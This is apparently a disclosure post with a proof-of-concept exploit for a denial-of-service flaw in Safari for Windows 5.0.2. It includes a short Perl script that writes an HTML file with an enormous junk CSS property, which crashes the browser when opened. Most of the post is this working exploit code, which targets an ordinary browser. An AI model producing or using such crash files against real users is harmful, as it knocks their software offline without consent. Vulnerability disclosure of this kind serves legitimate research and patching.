Safari for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.
The following are vulnerable:
safari for windows 5.0.2(7533.18.5)
###########
Sample PoC
###########
Generate the Crash file and open it with safari,it hangs and arround
one minut it crash
with a anormal program termination.
#########################################################################
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_safari.html";
my $junk= "A/" x 20000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS:
".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_safari.html File Created successfully\n";
close($FILE);
############################# EOF ############################
Atentamente:
Lostmon (los...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....